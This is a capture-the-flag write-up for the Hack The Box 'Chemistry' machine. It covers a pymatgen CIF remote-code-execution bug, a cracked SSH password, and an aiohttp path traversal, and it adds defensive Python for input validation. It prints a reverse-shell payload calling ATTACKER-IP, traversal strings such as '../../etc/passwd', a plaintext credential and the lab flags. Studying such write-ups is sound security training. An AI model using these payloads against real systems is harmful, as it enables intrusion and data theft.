
Hack The Box

Chemistry

Tags: HTB, Easy, Linux, RCE, File Upload, PrivEsc

Summary

Chemistry is an Easy Linux machine running a Flask CIF Analyzer web app. The app parses uploaded CIF files with pymatgen, which is vulnerable to remote code execution (CVE-2024-23346), yielding a reverse shell. A local SQLite database exposes a password hash that, once cracked, grants SSH access as rosa. An internal AioHTTP service exposed on localhost is then abused via path traversal to read the root flag.

Machine Information

Name:       Chemistry
Difficulty: Easy
OS:         Linux
Platform:   Hack The Box

Attack Path

  1. Nmap reveals SSH and an HTTP service on port 5000.
  2. The web application allows authenticated CIF file uploads.
  3. A malicious CIF file exploits the pymatgen RCE (CVE-2024-23346).
  4. A reverse shell is obtained on the server.
  5. A local database file reveals a password hash.
  6. The hash is cracked and reused for SSH access as rosa.
  7. An internal service on localhost is reached through SSH tunneling.
  8. A path traversal vulnerability is exploited to read the root flag.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sC -sV -A 10.10.11.38

(Screenshot: Nmap scan)

Port   Service
22     SSH
5000   HTTP (Python Flask)

The web application hosted a CIF Analyzer used to upload and analyze crystallographic files.

Web Enumeration

The application exposed a login and registration system. After registering an account, the dashboard allowed users to upload CIF files.

(Screenshot: Upload feature)

Exploitation — pymatgen RCE (CVE-2024-23346)

The application uses the pymatgen library to process CIF files. In the affected versions, the CIF parser passes values taken from the file to eval(), so a crafted CIF file executes arbitrary Python code as soon as it is parsed.

A malicious CIF file was created with a reverse shell payload:

system("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1'")

After uploading the file and triggering the parser, a reverse shell was received.
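As an added defensive illustration (not code from this writeup, from the target application, or from pymatgen), the following Python check shows the kind of allow-list gate an upload handler can apply before a CIF file ever reaches the parser. It assumes that the standard symmetry-operation tags `_symmetry_equiv_pos_as_xyz` and `_space_group_symop_operation_xyz` carry the expressions the vulnerable parser evaluates; the writeup does not say which tags are involved, and the sample CIF text below is constructed. A gate like this complements patching (upgrading pymatgen past the vulnerable version); it does not replace it.

```python
import re
import shlex
from typing import List

# Assumption: these standard CIF tags hold the symmetry expressions that the
# vulnerable parser turns into Python via eval(). Adjust if your parser differs.
SYMOP_TAGS = {
    "_symmetry_equiv_pos_as_xyz",
    "_space_group_symop_operation_xyz",
}

# Allow-list: a symmetry operation is exactly three comma-separated affine
# expressions in x, y, z with integer or fractional coefficients. Anything
# else (parentheses, names, underscores, quotes) is rejected outright.
SYMOP_RE = re.compile(r"^[xyzXYZ0-9+\-*/. ]+(?:,[xyzXYZ0-9+\-*/. ]+){2}$")


def _split_row(line: str) -> List[str]:
    """Split a CIF data row into fields, honouring single and double quotes."""
    try:
        return shlex.split(line, posix=True)
    except ValueError:
        # Unbalanced quotes: hand back the raw line so it fails the allow-list.
        return [line]


def find_unsafe_symops(cif_text: str) -> List[str]:
    """Return every symmetry-operation value that is not on the allow-list."""
    bad: List[str] = []
    lines = [ln.rstrip() for ln in cif_text.splitlines()]
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        if line.lower() == "loop_":
            # Collect the loop header: one _tag per line.
            tags: List[str] = []
            i += 1
            while i < len(lines) and lines[i].strip().startswith("_"):
                tags.append(lines[i].strip().split()[0].lower())
                i += 1
            symop_cols = [k for k, t in enumerate(tags) if t in SYMOP_TAGS]
            # Consume data rows (one row per line) until the block ends.
            while i < len(lines):
                row = lines[i].strip()
                if (not row or row.lower() == "loop_"
                        or row.startswith("_") or row.startswith("data_")):
                    break
                if symop_cols and not row.startswith("#"):
                    fields = _split_row(row)
                    for col in symop_cols:
                        if col < len(fields):
                            value = fields[col].strip()
                            if not SYMOP_RE.fullmatch(value):
                                bad.append(value)
                i += 1
            continue
        # Non-loop form: "_tag 'value'" on a single line.
        parts = _split_row(line)
        if parts and parts[0].lower() in SYMOP_TAGS and len(parts) > 1:
            value = parts[1].strip()
            if not SYMOP_RE.fullmatch(value):
                bad.append(value)
        i += 1
    return bad


def is_safe_cif(cif_text: str) -> bool:
    """Upload gate: accept the file only if every symop passes the allow-list."""
    return not find_unsafe_symops(cif_text)


# Constructed sample inputs (not taken from the machine).
CLEAN_CIF = """\
data_constructed_example
_cell_length_a 5.43
loop_
_space_group_symop_operation_xyz
'x, y, z'
'-x, -y, -z'
'-x+1/2, y+1/2, -z'
"""

# A symop containing a function call: harmless here, but outside the
# allow-list, so the upload is refused before the parser sees it.
SUSPICIOUS_CIF = """\
data_constructed_example
loop_
_symmetry_equiv_pos_as_xyz
'x, y, z'
'x, y, len(z)'
"""

if __name__ == "__main__":
    print("clean accepted:", is_safe_cif(CLEAN_CIF))
    print("suspicious rejected:", find_unsafe_symops(SUSPICIOUS_CIF))
```

Run the gate on the raw upload before calling the CIF parser and reject the file (and log the offending value) when `find_unsafe_symops` returns anything.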

Credential Discovery

Exploring the filesystem revealed a SQLite database containing stored credentials.

cat database.db

(Screenshot: Database hash)

The extracted hash was cracked offline:

(Screenshot: Cracked hash)

rosa : unicorniosrosados

Initial Access

The recovered credentials were reused to authenticate over SSH as rosa.

ssh rosa@10.10.11.38

This provided the initial foothold on the system.

Privilege Escalation

Enumeration

Listing listening sockets revealed an internal service on localhost:8080.

netstat -nltp

(Screenshot: Internal service)

An SSH tunnel was used to reach the service from the attacker machine.

ssh -L 8888:127.0.0.1:8080 rosa@10.10.11.38

Path Traversal (AioHTTP)

The internal application (running as root) was vulnerable to path traversal, allowing arbitrary file reads. This was abused to read the root flag directly.
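The writeup does not show the internal service's code, so the following is an added example (not the machine's code and not part of aiohttp) of how a file-serving handler should confine requests to its document root. It percent-decodes the request path first, normalises it relative to a base directory, and then, when actually opening the file, resolves symlinks and re-checks containment. Base directory and request strings in the test are constructed.

```python
import posixpath
from pathlib import Path
from typing import Optional
from urllib.parse import unquote


def safe_join(base_dir: str, requested: str) -> Optional[str]:
    """Map a request path onto base_dir; return None if it would escape."""
    decoded = unquote(requested)          # undo %2e%2e-style encoding first
    if "\x00" in decoded:                 # NUL bytes have no place in a path
        return None
    base = posixpath.normpath(base_dir)
    # Treat the request as relative to base even if it begins with '/'.
    candidate = posixpath.normpath(posixpath.join(base, decoded.lstrip("/")))
    # Compare with a trailing separator so that a sibling directory whose
    # name merely starts with base (e.g. base_dir + "2") is not accepted.
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


def read_text_under(base_dir: str, requested: str) -> Optional[str]:
    """Read a regular file beneath base_dir, refusing traversal and symlink escapes."""
    joined = safe_join(base_dir, requested)
    if joined is None:
        return None
    base_real = Path(base_dir).resolve()
    target = Path(joined).resolve()       # follows symlinks to the real file
    if not target.is_relative_to(base_real):
        return None                       # symlink pointed outside the root
    if not target.is_file():
        return None
    return target.read_text()


if __name__ == "__main__":
    # Constructed demonstration paths; nothing here is read from disk.
    for req in ("report.txt", "a/../b.txt", "../../etc/passwd",
                "%2e%2e/%2e%2e/etc/passwd", "../files2/x"):
        print(f"{req!r:30} -> {safe_join('/srv/files', req)}")
```

In the aiohttp handler, pass the matched path segment to `read_text_under` and answer 404 whenever it returns None; never build the filesystem path by string concatenation on the raw request.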

Flags

User

cat /home/rosa/user.txt

(Screenshot: User flag)

584e2c0f8f541ed3cd0668cbac6fb292

Root

# via the path traversal on the internal service

(Screenshot: Root flag)

f4cad6dda7ee09c56b082148357d58db

Vulnerabilities Identified

Remote Code Execution — pymatgen (CVE-2024-23346)

Impact: remote code execution and an initial foothold on the server.

Path Traversal — AioHTTP

Impact: arbitrary file read, including sensitive system files and the root flag.

Tools Used

Key Takeaways